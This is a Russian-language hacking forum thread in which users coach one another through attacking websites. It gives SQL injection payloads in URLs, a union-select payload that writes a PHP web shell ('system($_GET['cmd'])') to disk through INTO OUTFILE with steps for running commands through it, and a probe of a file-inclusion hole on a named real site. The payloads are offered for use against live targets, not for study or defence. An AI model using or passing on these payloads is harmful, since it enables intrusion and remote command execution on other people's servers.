так тебе ничего никто не поможет.. нужно ссылку на сайт со скулей.

http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

Это к примеру,т.к точного уязвимого скрипта нет.

вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти

Скидывай лог ошибки и если есть возможность изменить скрипт выводи sql запрос в браузер,так проще будет разобраться в чем причина.

тоесть как выводит то сам запрос в браузер

отправил в пм линк

спасибо M.W.N.N. и Rullery =)

ну вот с привелегий FILE разобрался , ребята не можете теперь помочь как залить шелл если имееться данная привелегия и слышал что вначале лучше залить какой то "плохой" шелл а далее через него уже нормальный.Кто что посоветует по данному сабжу?

union+select+'<? system($_GET['cmd']); ?>'+into+outfile+'/[path]/shell.php'
Дальше site.com/shell.php?cmd=[command]

http://www.wearhouse.ru/show_img.php?img=http://img.yandex.net/i/www/logo.png

можно инклудить любую картинку, есть возможность заинклудить не картинку?